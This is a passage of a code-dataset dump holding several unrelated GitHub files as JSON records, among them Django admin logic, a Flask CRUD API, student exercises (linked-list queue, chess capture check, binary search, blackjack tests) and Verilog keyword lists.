self.list_editable = ('assignee', 'from_date', 'to_date', 'visit_date')\n self.list_filter = ['assignee', EntranceListFilter]\n if 'entrance__id__exact' in request.GET:\n self.list_display = ('id','assignee', 'from_date', 'to_date', 'visit_date')\n else:\n self.list_display = ('entrance', 'assignee', 'from_date', 'to_date', 'visit_date')\n\n else:\n self.list_display = ('entrance', 'assignee', 'visit_date')\n self.list_editable = []\n self.list_filter = []\n\n return super(ScheduleAdmin, self).changelist_view(request, extra_context)\n\n def get_queryset(self, request):\n qs = super(ScheduleAdmin, self).get_queryset(request)\n if not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n if 2 not in request.user.groups.all().values_list('id', flat=True):\n qs = qs.filter(assignee=request.user)\n return qs\n\n def get_form(self, request, obj=None, **kwargs):\n self.readonly_fields = ()\n self.exclude = []\n if not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n self.readonly_fields = ('entrance', 'visit_date')\n self.exclude.append('from_date')\n self.exclude.append('to_date')\n self.exclude.append('assignee')\n\n return super(ScheduleAdmin, self).get_form(request, obj, **kwargs)\n\nadmin.site.register(PartialTaskPay,PartialTaskPayAdmin) #Rajdeep\n\nadmin.site.register(Task, TaskAdmin)\nadmin.site.register(Schedule, ScheduleAdmin)\nadmin.site.register(PaymentAhead, PaymentAheadAdmin)\n","repo_name":"Happyandhappy/django_email","sub_path":"tasks/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":24748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24936110286","text":"def check_capture(queen_pos, king_pos):\n r_q, r_k = queen_pos[0], king_pos[0]\n c_q, c_k = queen_pos[1], king_pos[1]\n r_min, r_max = min(r_q, r_k), max(r_q, r_k)\n c_min, c_max = min(c_q, c_k), max(c_q, c_k)\n\n if r_q == r_k:\n horizontal = board[r_q][c_min + 1:c_max]\n if all([x == \".\" for x in horizontal]):\n capturing.append([r_q, c_q])\n elif c_q == c_k:\n vertical = [board[r][c_q] for r in range(r_min + 1, r_max)]\n if all([x == \".\" for x in vertical]):\n capturing.append([r_q, c_q])\n elif r_q - c_q == r_k - c_k:\n dia_one = [board[r][c] for r in range(r_min + 1, r_max) for c in range(c_min + 1, c_max) if r - c == r_q - c_q]\n if all(x == \".\" for x in dia_one):\n capturing.append([r_q, c_q])\n elif r_q + c_q == r_k + c_k:\n dia_two = [board[r][c] for r in range(r_min + 1, r_max) for c in range(c_min + 1, c_max) if r + c == r_q + c_q]\n if all(x == \".\" for x in dia_two):\n capturing.append([r_q, c_q])\n\n\nSIZE = 8\n\nboard, queens, capturing, king_position = [], [], [], []\nking_found = False\n\nfor row in range(SIZE):\n line = input().split(\" \")\n\n for i in range(len(line)):\n if line[i] == \"Q\":\n queens.append([row, i])\n\n if not king_found:\n if \"K\" in line:\n king_position = [row, line.index(\"K\")]\n king_found = True\n\n board.append(line)\n\nfor queen in queens:\n check_capture(queen, king_position)\n\nif capturing:\n print(*capturing, sep=\"\\n\")\nelse:\n print(\"The king is safe!\")\n","repo_name":"Polishko/SoftUni","sub_path":"Python Advanced Exams/October 2020/checkmate.py","file_name":"checkmate.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32832702172","text":"from flask import Blueprint, request\nfrom flask.json import jsonify\nfrom config_db import db\nfrom models.ente_model import Ente\nfrom schemas.ente_schema import ente_schema, enti_schema\n\nente_bp = Blueprint('ente_bp', __name__)\n\n@ente_bp.route(\"/ente\", methods=[\"GET\"])\ndef get_enti():\n all_enti = Ente.query.all()\n result = enti_schema.dump(all_enti)\n return jsonify(result)\n\n@ente_bp.route(\"/ente\", methods=[\"POST\"])\ndef add_ente():\n id_citta = request.json['id_citta']\n nome = request.json['nome']\n email = request.json['email']\n telefono = request.json['telefono']\n via = request.json['via']\n civico = request.json['civico']\n cap = request.json['cap']\n \n\n new_ente = Ente(id_citta, nome, email, telefono, via, civico, cap)\n db.session.add(new_ente)\n db.session.commit()\n return ente_schema.jsonify(new_ente)\n\n@ente_bp.route(\"/ente/\", methods=[\"GET\"])\ndef get_ente(id):\n ente = Ente.query.get(id)\n return ente_schema.jsonify(ente)\n\n@ente_bp.route(\"/ente/\", methods=[\"PUT\"])\ndef update_ente(id):\n ente = Ente.query.get(id)\n ente.id_citta = request.json['id_citta']\n ente.nome = request.json['nome']\n ente.email = request.json['email']\n ente.telefono = request.json['telefono']\n ente.via = request.json['via']\n ente.civico = request.json['civico']\n ente.cap = request.json['cap']\n \n db.session.commit()\n return ente_schema.jsonify(ente)\n\n@ente_bp.route(\"/ente/\", methods=['DELETE'])\ndef delete_ente(id):\n ente = Ente.query.get(id)\n db.session.delete(ente)\n db.session.commit()\n return ente_schema.jsonify(ente)","repo_name":"BernardoDePietro/SCD_blockchain_permissioned","sub_path":"fabric-samples/unime/api/blueprints/ente.py","file_name":"ente.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74453438246","text":"\nfrom collections import deque\nfrom typing import Deque\n\n\nclass LinkedList:\n class Node :\n def __init__(self,data,next = None) :\n self.data = data\n if next is None :\n self.next = None\n else :\n self.next = next\n \n def __str__(self) :\n return str(self.data)\n\n def __init__(self,head = None):\n if head == None:\n self.head = self.tail = None\n self.size = 0\n else:\n self.head = head\n t = self.head \n self.size = 1\n while t.next != None :\n t = t.next\n self.size += 1\n self.tail = t\n \n def __str__(self) :\n # s = 'Linked data : '\n s = ''\n p = self.head\n while p != None :\n s += str(p.data)+' '\n p = p.next\n return s\n\n def __len__(self) :\n return self.size\n \n def append(self, data):\n p = self.Node(data)\n if self.head == None:\n self.head = self.tail = p\n else:\n t = self.tail\n t.next = p \n self.tail =p \n self.size += 1\n\n def removeHead(self) :\n if self.head == None : return\n if self.head.next == None :\n p = self.head\n self.head = None\n else :\n p = self.head\n self.head = self.head.next\n self.size -= 1\n return p.data\n \n def isEmpty(self) :\n return self.size == 0\n \n def nodeAt(self,i) :\n p = self.head\n for j in range(i) :\n p = p.next\n return p\n\n def reverse(self) :\n if self.isEmpty() :\n return\n\n else :\n p = self.head\n prev = None\n while p != None :\n n = p.next\n p.next = prev\n prev = p\n p = n\n self.head = prev\n return\n\n def check(self, data) :\n p = self.head\n if self.isEmpty() :\n return 0\n else :\n while p.next != None :\n if p.data == data :\n return 1\n p = p.next\n if p.data == data :\n return 1\n return 0\n\nclass Queue() :\n def __init__(self) :\n self._list = LinkedList()\n\n def __str__(self) :\n if not self.isEmpty() :\n result = ''\n for i in range(len(self._list)-1) :\n _data = self._list.nodeAt(i).data\n result += str(_data) + ' <- '\n return result + str(self._list.tail.data)\n return 'Empty Queue'\n\n def enQueue(self, data) :\n self._list.append(data)\n\n def deQueue(self) :\n # if not self.isEmpty() :\n return self._list.removeHead()\n # return\n\n def __len__(self) :\n return len(self._list)\n\n def isEmpty(self) :\n return len(self._list) == 0\n\n def checkDup(self) :\n\n # print('Hello')\n _check = LinkedList()\n # print('======')\n # print(_check)\n # print('======')\n # print(self)\n for i in range(len(self._list)) :\n _data = self._list.nodeAt(i).data\n # print(_data)\n # print(_check)\n # if _data not in :\n if _check.check(_data) == 0 :\n _check.append(_data)\n else : \n return 'Duplicate'\n return 'NO Duplicate'\n\n def zero(self) :\n foundZero = False\n \n if not self.isEmpty() :\n for i in range(len(self._list)) :\n _data = self._list.nodeAt(i).data\n print(f'{i} | {_data}')\n if _data == 0 :\n print(f'\\tfound {_data}')\n break\n else :\n self.deQueue()\n print(f'\\tlist {self._list}')\n self.enQueue('test')\n print(f'\\tlist {self._list}')\n\n # self.enQueue(self.deQueue())\n # print(f'list {self._list}')\n return\n '''\n *** Re order ***\n Enter Input : 2 3 1 0 4 5 6\n Before : 2 <- 3 <- 1 <- 0 <- 4 <- 5 <- 6\n After : 0 <- 4 <- 5 <- 6 <- 2 <- 3 <- 1\n '''\n\nif __name__ == '__main__' :\n _input = input(' *** Re order ***\\nEnter Input : ').split()\n\n q = Queue()\n for i in _input :\n q.enQueue(int(i))\n print(f\"Before : {q}\")\n q.zero()\n print(f\"After : {q}\")\n\n\n\n'''\nChapter : 14 - item : 4 - Exam_SQL_2_4aa\n ส่งมาแล้ว 0 ครั้ง\nจงเขียนโปรแกรมแบ่งการเรียงลำดับจากตัวเลขที่ป้อนเข้าไป โดยให้ส่วนต้นเริ่มที่เลข 0 ต่อด้วยส่วนท้ายของลำดับที่เหลือ ดังตัวอย่าง\n\nการเขียนโปรแกรมนี้ให้การเขียนโปรแกรมด้วย singly linked list\n\nตัวอย่าง\n\n\n\nEnter Input : 2 3 1 0 4 5 6\n\nBefore : 2 <- 3 <- 1 <- 0 <- 4 <- 5 <- 6\n\nAfter : 0 <- 4 <- 5 <- 6 <- 2 <- 3 <- 1\n\n\n\nEnter Input : 1 0\n\nBefore : 1 <- 0\n\nAfter : 0 <- 1\n\n\n\nEnter Input : 0 1 2 3 4 5 6 7 8 9\n\nBefore : 0 <- 1 <- 2 <- 3 <- 4 <- 5 <- 6 <- 7 <- 8 <- 9\n\n\nAfter : 0 <- 1 <- 2 <- 3 <- 4 <- 5 <- 6 <- 7 <- 8 <- 9\n\n\n\nEnter Input : 1 2 3 0\n\nBefore : 1 <- 2 <- 3 <- 0\n\nAfter : 0 <- 1 <- 2 <- 3\n\n'''\n\n\n\n\n# *** Re order ***\n# Enter Input : 2 3 1 0 4 5 6\n# Before : 2 <- 3 <- 1 <- 0 <- 4 <- 5 <- 6\n# After : 0 <- 4 <- 5 <- 6 <- 2 <- 3 <- 1\n\n# *** Re order ***\n# Enter Input : 1 0\n# Before : 1 <- 0\n# After : 0 <- 1\n\n# *** Re order ***\n# Enter Input : 1 2 3 0\n# Before : 1 <- 2 <- 3 <- 0\n# After : 0 <- 1 <- 2 <- 3\n\n\n# *** Re order ***\n# Enter Input : 0 1 2 3 4 5 6 7 8 9\n# Before : 0 <- 1 <- 2 <- 3 <- 4 <- 5 <- 6 <- 7 <- 8 <- 9\n# After : 0 <- 1 <- 2 <- 3 <- 4 <- 5 <- 6 <- 7 <- 8 <- 9","repo_name":"Charonyx/DataStruct2564","sub_path":"Exam02 Stack Queue LinkedList/exam02_04.py","file_name":"exam02_04.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"270652978","text":"import jangopath\nimport os\n\ndef handle():\n time = raw_input(\"Enter time(HH:MM:SS) : \")\n time = time.split(\":\")\n hour = int(time[0])\n minute = int(time[1])\n second = int(time[2])\n hour = hour*3600\n minute = minute*60\n total = hour + minute + second\n path = jangopath.MODULE_PATH + \"/timer_helper.py\"\n os.system(\"python \" + path + \" \" + str(total) + \" & \" )\n\nhandle()\n","repo_name":"demo32501/Jango","sub_path":"jango/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73953905769","text":"\n\nclass Solution:\n \n def getFirst(self, nums, target):\n left = 0\n right = len(nums) -1 \n while left <= right:\n mid = (left+right) // 2\n if nums[mid] == target:\n if mid == 0 or nums[mid-1] != target:\n return mid\n right = mid - 1 \n elif nums[mid] > target:\n right = mid - 1\n else:\n left = mid + 1\n \n return -1\n \n def getSecond(self, nums, target):\n left = 0\n right = len(nums) - 1\n \n while left <= right:\n mid = (left+right) // 2\n if nums[mid] == target:\n if mid == len(nums)-1 or nums[mid+1] != target:\n return mid\n left = mid + 1\n elif nums[mid] > target:\n right = mid - 1\n else:\n left = mid + 1\n return -1\n \n def searchRange(self, nums, target):\n first = self.getFirst(nums, target)\n second = self.getSecond(nums, target)\n \n return [first, second]\n\n\nsol = Solution()\n\nprint(sol.searchRange([5,7,7,8,8,10], 8))","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/BinarySearch/findFirstAndLastPositionOfElement.py","file_name":"findFirstAndLastPositionOfElement.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21375341189","text":"from unittest import mock, TestCase, main\nfrom vizyb.blackjack.blackjack import *\n\n\nclass Testing(TestCase):\n \"\"\" python3 -m unittest vizyb.blackjack.blackjack_tests.Testing \"\"\"\n\n def setUp(self):\n self.gambler = Gambler()\n self.player = Player()\n self.deck = Deck()\n self.deck.shuffle_deck()\n self.dealer = Dealer()\n self.dealer.deck.shuffle_deck()\n\n def test_card(self):\n card = Card(\"6\", \"Spades\")\n self.assertEqual(card.numerical_value(), 6)\n card = Card(\"J\", \"Hearts\")\n self.assertEqual(card.numerical_value(), 10) # Assert faced values\n card = Card(\"1\", \"Jacks\")\n self.assertEqual(card.numerical_value(), 1)\n\n def test_deck(self):\n self.assertEqual(len(self.deck.cards), 52) # Assert full deck\n deck_cards_order = str(self.deck.cards)\n self.deck.shuffle_deck()\n self.assertNotEqual(deck_cards_order, str(self.deck.cards)) # Assert shuffle works\n self.deck.cards.pop() # deal one card\n self.assertEqual(len(self.deck.cards), 51)\n self.deck.create_deck() # pick up all the cards again\n self.assertEqual(len(self.deck.cards), 52)\n\n def test_player(self):\n self.assertEqual(self.player.hand, []) # Assert hand not None\n card = self.deck.cards.pop()\n self.player.hand.append(card) # Draw card\n self.assertIn(card, self.player.hand) # Assert card in player hand\n self.player.clear_hand() # Clear hand\n self.assertNotIn(card, self.player.hand) # Assert card no longer in hand\n\n def test_dealer(self):\n self.assertEqual(len(self.dealer.deck.cards), 52) # Assert init with full deck\n\n def test_gambler(self):\n self.assertEqual(self.gambler.money, 100) # Assert start money\n # Mock interactive input module\n with mock.patch('inquirer.prompt', return_value={\"bet_quantity\": \"50\"}):\n self.assertEqual(self.gambler.make_a_bet(), 50) # Make a bet\n\n def test_validate_bet(self):\n self.assertFalse(validate_bet(self.gambler, \"1000\"))\n self.assertTrue(validate_bet(self.gambler, \"50\"))\n self.assertFalse(validate_bet(self.gambler, \"-1000\"))\n self.assertFalse(validate_bet(self.gambler, \"ABC\"))\n self.gambler.money = 1500\n self.assertTrue(validate_bet(self.gambler, \"1000\"))\n\n def test_count_values(self):\n card1 = Card('J', 'Spades')\n self.player.hand.append(card1) # Draw card\n card2 = Card('Q', 'Hearts')\n self.player.hand.append(card2) # Draw card\n self.assertEqual(count_values(self.player), card1.numerical_value() + card2.numerical_value())\n self.player.clear_hand()\n card1 = Card('10', 'Spades')\n self.player.hand.append(card1) # Draw card\n card2 = Card('1', 'Clubs')\n self.player.hand.append(card2) # Draw card\n self.assertEqual(count_values(self.player), 21)\n\n def test_play_a_round(self):\n with mock.patch('inquirer.prompt', return_value={\"draw\": \"Stay\"}):\n play_a_round(self.dealer, self.gambler, 50) # Player bets 50\n # We are stubbing prompt so player only drew 2 cards, therefore <= 21\n self.assertLessEqual(count_values(self.gambler), 21)\n if count_values(self.gambler) != 21: # if the player didn't blackjack, dealer should be >17\n self.assertGreaterEqual(count_values(self.dealer), 17)\n # otherwise if the player lost, he should have forfeited his bet\n elif count_values(self.gambler) < count_values(self.dealer):\n self.assertEqual(self.gambler.money, 50)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Rivia-Team/Python-Coding-Projects","sub_path":"vizyb/blackjack/blackjack_tests.py","file_name":"blackjack_tests.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22692225270","text":"N = int(input())\na1 = [\"tret\", \"jan\", \"feb\", \"mar\", \"apr\", \"may\", \"jun\", \"jly\", \"aug\", \"sep\", \"oct\", \"nov\", \"dec\"]\na2 = [\"tret\", \"tam\", \"hel\", \"maa\", \"huh\", \"tou\", \"kes\", \"hei\", \"elo\", \"syy\", \"lok\", \"mer\", \"jou\"]\n\n\ndef deci_to_base(n):\n s = \"\"\n if n%13 == 0:\n return a2[n//13]\n s = a1[n%13] + s\n if n//13 > 0:\n s = a2[n//13] + ' ' + s\n return s\n\ndef base_to_deci(sl):\n n = 0\n for i in sl:\n if i in a1:\n n += a1.index(i)\n else:\n n += a2.index(i)*13\n return n\n\nif __name__ == \"__main__\":\n for _ in range(N):\n n = input()\n if n.isdigit():\n print(deci_to_base(int(n)))\n else:\n print(base_to_deci(n.split()))","repo_name":"xiaoyuzaijia/PAT_Advance_level","sub_path":"1100 Mars Numbers.py","file_name":"1100 Mars Numbers.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31109872902","text":"import pandas as pd\n\n# Read the csv\ndf = pd.read_csv('auto.csv')\n\n# Remove all rows with 'mpg' lower than 16\nfiltered = df.query('mpg >= 16')\n# Another solution\ndf[df.mpg >= 16]\nprint(filtered.head())\n\n# Get the first 7 rows of the columns 'weights' and 'acceleration'\nfirst7 = df[['weight', 'acceleration']][:7]\n# Or\nfirst7 = df[['weight', 'acceleration']].head(7)\n\n# Remove the rows in the 'horsepower' column that has the value '?' and convert the column\n# to an int type instead of a string\ncols = df[df.horsepower != '?']\ncols['horsepower'] = cols['horsepower'].astype(int)\n\n# Average of every column but name\ndf.loc[:, df.columns != 'name'].mean()\n","repo_name":"micheleberetta98/sdu-deep-learning-2021","sub_path":"day-1/es02.py","file_name":"es02.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19001496845","text":"import numpy as np\n\nfrom .postprocessing import *\n\n\ndef smoothened_dissimilarity_measures(\n encoded_windows=None, encoded_windows_fft=None, window_size=20\n):\n \"\"\"\n Calculation of smoothened dissimilarity measures\n\n Args:\n encoded_windows: TD latent representation of windows\n encoded_windows_fft: FD latent representation of windows\n domain: TD/FD/both\n parameters: array with used parameters\n window_size: window size used\n par_smooth\n\n Returns:\n smoothened dissimilarity measures\n \"\"\"\n if encoded_windows_fft is None:\n encoded_windows_both = encoded_windows\n elif encoded_windows is None:\n encoded_windows_both = encoded_windows_fft\n else:\n beta = np.quantile(distance(encoded_windows, window_size), 0.95)\n alpha = np.quantile(distance(encoded_windows_fft, window_size), 0.95)\n encoded_windows_both = np.concatenate(\n (encoded_windows * alpha, encoded_windows_fft * beta), axis=1\n )\n\n encoded_windows_both = matched_filter(\n encoded_windows_both, window_size\n ) # smoothing for shared features (9)\n distances = distance(encoded_windows_both, window_size)\n distances = matched_filter(\n distances, window_size\n ) # smoothing for dissimilarity (12)\n\n return distances\n\n\ndef change_point_score(distances, window_size):\n \"\"\"\n Gives the change point score for each time stamp. A change point score > 0 indicates that a new segment starts at that time stamp.\n\n Args:\n distances: postprocessed dissimilarity measure for all time stamps\n window_size: window size used in TD for CPD\n\n Returns:\n change point scores for every time stamp (i.e. zero-padded such that length is same as length time series)\n \"\"\"\n prominences = np.array(new_peak_prominences(distances)[0])\n prominences = prominences / np.amax(prominences)\n return np.concatenate(\n (np.zeros((window_size,)), prominences, np.zeros((window_size - 1,)))\n )\n","repo_name":"caozhenxiang/ICPD","sub_path":"utils/tire/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42536476359","text":"\"\"\"\n(System)Verilog language keyword lists\n\"\"\"\n\nIEEE1364_1995_KEYWORDS = [\n \"always\",\n \"and\",\n \"assign\",\n \"begin\",\n \"buf\",\n \"bufif0\",\n \"bufif1\",\n \"case\",\n \"casex\",\n \"casez\",\n \"cmos\",\n \"deassign\",\n \"default\",\n \"defparam\",\n \"disable\",\n \"edge\",\n \"else\",\n \"end\",\n \"endcase\",\n \"endfunction\",\n \"endmodule\",\n \"endprimitive\",\n \"endspecify\",\n \"endtable\",\n \"endtask\",\n \"event\",\n \"for\",\n \"force\",\n \"forever\",\n \"fork\",\n \"function\",\n \"highz0\",\n \"highz1\",\n \"if\",\n \"ifnone\",\n \"rpmos\",\n \"initial\",\n \"rtran\",\n \"inout\",\n \"rtranif0\",\n \"input\",\n \"rtranif1\",\n \"integer\",\n \"scalared\",\n \"join\",\n \"small\",\n \"large\",\n \"specify\",\n \"macromodule\",\n \"specparam\",\n \"medium\",\n \"strong0\",\n \"module\",\n \"strong1\",\n \"nand\",\n \"supply0\",\n \"negedge\",\n \"supply1\",\n \"nmos\",\n \"table\",\n \"nor\",\n \"task\",\n \"not\",\n \"time\",\n \"notif0\",\n \"tran\",\n \"notif1\",\n \"tranif0\",\n \"or\",\n \"tranif1\",\n \"output\",\n \"tri\",\n \"parameter\",\n \"tri0\",\n \"pmos\",\n \"tri1\",\n \"posedge\",\n \"triand\",\n \"primitive\",\n \"trior\",\n \"pull0\",\n \"trireg\",\n \"pull1\",\n \"vectored\",\n \"pulldown\",\n \"wait\",\n \"pullup\",\n \"wand\",\n \"rcmos\",\n \"weak0\",\n \"real\",\n \"weak1\",\n \"realtime\",\n \"while\",\n \"reg\",\n \"wire\",\n \"release\",\n \"wor\",\n \"repeat\",\n \"xnor\",\n \"rnmos\",\n \"xor\",\n]\n\nIEEE1364_2001_KEYWORDS = IEEE1364_1995_KEYWORDS + [\n \"automatic\",\n \"cell\",\n \"config\",\n \"incdir\",\n \"include\",\n \"instance\",\n \"liblist\",\n \"library\",\n \"localparam\",\n \"noshowcancelled\",\n \"pulsestyle_ondetect\",\n \"design\",\n \"endconfig\",\n \"endgenerate\",\n \"generate\",\n \"genvar\",\n \"pulsestyle_onevent\",\n \"showcancelled\",\n \"signed\",\n \"unsigned\",\n \"use\",\n]\n\nIEEE1364_2001_NOCONFIG_KEYWORDS = [\n kw for kw in IEEE1364_2001_KEYWORDS if kw not in {\n \"cell\",\n \"config\",\n \"design\",\n \"endconfig\",\n \"incdir\",\n \"include\",\n \"instance\",\n \"liblist\",\n \"library\",\n \"use\",\n }\n]\n\nIEEE1364_2005_KEYWORDS = IEEE1364_2001_KEYWORDS + [\"uwire\"]\n\nIEEE1800_2005_KEYWORDS = IEEE1364_2005_KEYWORDS + [\n \"alias\",\n \"endsequence\",\n \"pure\",\n \"always_comb\",\n \"enum\",\n \"rand\",\n \"always_ff\",\n \"expect\",\n \"randc\",\n \"always_latch\",\n \"export\",\n \"randcase\",\n \"assert\",\n \"extends\",\n \"randsequence\",\n \"assume\",\n \"extern\",\n \"ref\",\n \"before\",\n \"final\",\n \"return\",\n \"bind\",\n \"first_match\",\n \"sequence\",\n \"bins\",\n \"foreach\",\n \"shortint\",\n \"binsof\",\n \"forkjoin\",\n \"shortreal\",\n \"bit\",\n \"iff\",\n \"solve\",\n \"break\",\n \"ignore_bins\",\n \"static\",\n \"byte\",\n \"illegal_bins\",\n \"string\",\n \"chandle\",\n \"import\",\n \"struct\",\n \"class\",\n \"inside\",\n \"super\",\n \"clocking\",\n \"int\",\n \"tagged\",\n \"const\",\n \"interface\",\n \"this\",\n \"constraint\",\n \"intersect\",\n \"throughout\",\n \"context\",\n \"join_any\",\n \"timeprecision\",\n \"continue\",\n \"join_none\",\n \"timeunit\",\n \"cover\",\n \"local\",\n \"type\",\n \"covergroup\",\n \"logic\",\n \"typedef\",\n \"coverpoint\",\n \"longint\",\n \"union\",\n \"cross\",\n \"matches\",\n \"unique\",\n \"dist\",\n \"modport\",\n \"var\",\n \"do\",\n \"new\",\n \"virtual\",\n \"endclass\",\n \"null\",\n \"void\",\n \"endclocking\",\n \"package\",\n \"wait_order\",\n \"endgroup\",\n \"packed\",\n \"wildcard\",\n \"endinterface\",\n \"priority\",\n \"with\",\n \"endpackage\",\n \"program\",\n \"within\",\n \"endprogram\",\n \"property\",\n \"endproperty\",\n \"protected\",\n]\n\nIEEE1800_2009_KEYWORDS = IEEE1800_2005_KEYWORDS + [\n \"accept_on\",\n \"checker\",\n \"endchecker\",\n \"eventually\",\n \"global\",\n \"implies\",\n \"let\",\n \"nexttime\",\n \"reject_on\",\n \"restrict\",\n \"s_always\",\n \"s_eventually\",\n \"s_nexttime\",\n \"s_until\",\n \"s_until_with\",\n \"strong\",\n \"sync_accept_on\",\n \"sync_reject_on\",\n \"unique0\",\n \"until\",\n \"until_with\",\n \"untyped\",\n \"weak\",\n]\n\nIEEE1800_2012_KEYWORDS = IEEE1800_2009_KEYWORDS + [\n \"implements\",\n \"nettype\",\n \"interconnect\",\n \"soft\",\n]\n\nIEEE1800_2017_KEYWORDS = IEEE1800_2012_KEYWORDS + [\n]\n\nIEEE1800_2017_DOLAR_SYMBOLS = [\n #Simulation control tasks (20.2) \n '$finish',\n '$stop',\n '$exit',\n # Simulation time functions (20.3)\n '$realtime',\n '$stime',\n '$time',\n # Timescale tasks (20.4)',\n '$printtimescale',\n '$timeformat',\n # Conversion functions (20.5)',\n '$bitstoreal',\n '$realtobits',\n '$bitstoshortreal',\n '$shortrealtobits',\n '$itor',\n '$rtoi',\n '$signed',\n '$unsigned',\n '$cast',\n # Data query functions (20.6)\n '$bits',\n '$isunbounded',\n '$typename',\n # Array query functions (20.7)\n '$unpacked_dimensions',\n '$dimensions',\n '$left',\n '$right',\n '$low',\n '$high',\n '$increment'\n '$size',\n # Math functions (20.8)\n '$clog2',\n '$asin',\n '$ln',\n '$acos',\n '$log10',\n '$atan',\n '$exp',\n '$atan2',\n '$sqrt',\n '$hypot',\n '$pow',\n '$sinh',\n '$floor',\n '$cosh',\n '$ceil',\n '$tanh',\n '$sin',\n '$asinh',\n '$cos',\n '$acosh',\n '$tan',\n '$atanh',\n # Bit vector system functions (20.9)\n '$countbits',\n '$countones',\n '$onehot',\n '$onehot0',\n '$isunknown',\n # Severity tasks (20.10)\n # Elaboration tasks (20.11)\n '$fatal',\n '$error',\n '$warning',\n '$info',\n # Assertion control tasks (20.12)\n '$asserton',\n '$assertoff',\n '$assertkill',\n '$assertcontrol',\n '$assertpasson',\n '$assertpassoff',\n '$assertfailon',\n '$assertfailoff',\n '$assertnonvacuouson',\n '$assertvacuousoff',\n # Sampled value system functions (20.13)\n '$sampled',\n '$rose',\n '$fell',\n '$stable',\n '$changed',\n '$past',\n '$past_gclk',\n '$rose_gclk',\n '$fell_gclk',\n '$stable_gclk',\n '$changed_gclk',\n '$future_gclk',\n '$rising_gclk',\n '$falling_gclk',\n '$steady_gclk',\n '$changing_gclk',\n # Coverage control functions (20.14)\n '$coverage_control',\n '$coverage_get_max',\n '$coverage_get',\n '$coverage_merge',\n '$coverage_save',\n '$get_coverage',\n '$set_coverage_db_name',\n '$load_coverage_db',\n # Probabilistic distribution functions (20.15)\n '$random',\n '$dist_chi_square',\n '$dist_erlang',\n '$dist_exponential',\n '$dist_normal',\n '$dist_poisson',\n '$dist_t',\n '$dist_uniform',\n # Stochastic analysis tasks and functions (20.16)\n '$q_initialize',\n '$q_add',\n '$q_remove',\n '$q_full',\n '$q_exam',\n # PLA modeling tasks (20.17)\n '$async$and$array',\n '$async$and$plane',\n '$async$nand$array',\n '$async$nand$plane',\n '$async$or$array',\n '$async$or$plane',\n '$async$nor$array',\n '$async$nor$plane',\n '$sync$and$array',\n '$sync$and$plane',\n '$sync$nand$array',\n '$sync$nand$plane',\n '$sync$or$array',\n '$sync$or$plane',\n '$sync$nor$array',\n '$sync$nor$plane',\n # Miscellaneous tasks and functions (20.18)\n '$system',\n #Display tasks (21.2)\n '$display',\n '$write',\n '$displayb',\n '$writeb',\n '$displayh',\n '$writeh ',\n '$displayo',\n '$writeo',\n '$strobe',\n '$monitor ',\n '$strobeb',\n '$monitorb',\n '$strobeh',\n '$monitorh',\n '$strobeo',\n '$monitoro',\n '$monitoroff',\n '$monitoron',\n # File I/O tasks and functions (21.3)\n '$fclose',\n '$fopen',\n '$fdisplay',\n '$fwrite',\n '$fdisplayb',\n '$fwriteb',\n '$fdisplayh',\n '$fwriteh ',\n '$fdisplayo',\n '$fwriteo',\n '$fstrobe',\n '$fmonitor ',\n '$fstrobeb',\n '$fmonitorb',\n '$fstrobeh',\n '$fmonitorh',\n '$fstrobeo',\n '$fmonitoro',\n '$swrite',\n '$sformat',\n '$swriteb',\n '$sformatf ',\n '$swriteh',\n '$fgetc',\n '$swriteo',\n '$ungetc',\n '$fscanf',\n '$fgets',\n '$fread',\n '$sscanf',\n '$fseek',\n '$rewind',\n '$fflush',\n '$ftell',\n '$feof ',\n '$ferror',\n # Memory load tasks (21.4)\n '$readmemb',\n '$readmemh',\n # Memory dump tasks (21.5)\n '$writememb',\n '$writememh',\n # Command line input (21.6)\n '$test',\n '$value',\n '$plusargs',\n # VCD tasks (21.7)\n '$dumpfile',\n '$dumpvars',\n '$dumpoff',\n '$dumpon',\n '$dumpall',\n '$dumplimit',\n '$dumpflush',\n '$dumpports',\n '$dumpportsoff',\n '$dumpportson',\n '$dumpportsall',\n '$dumpportslimit',\n '$dumpportsflush',\n \n]","repo_name":"Nic30/hdlConvertorAst","sub_path":"hdlConvertorAst/to/verilog/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":8654,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"21201908776","text":"#!/usr/bin/python3\n\nimport math\nimport copy\n\ndef read_input(input_file):\n with open(input_file, 'r') as input_file:\n data = input_file.read()[:-1]\n data = data.split('\\n')\n return data\n\ndef rotate_quick(wayp_pos, deg, dir=1):\n for i in range(abs(deg)//90):\n wayp_pos = [-dir*wayp_pos[1], dir*wayp_pos[0]]\n return wayp_pos\n\ndef part1(data = False):\n if not data:\n data = read_input('input')\n pos = [0,0]\n dir = 0\n for instr in data:\n param = 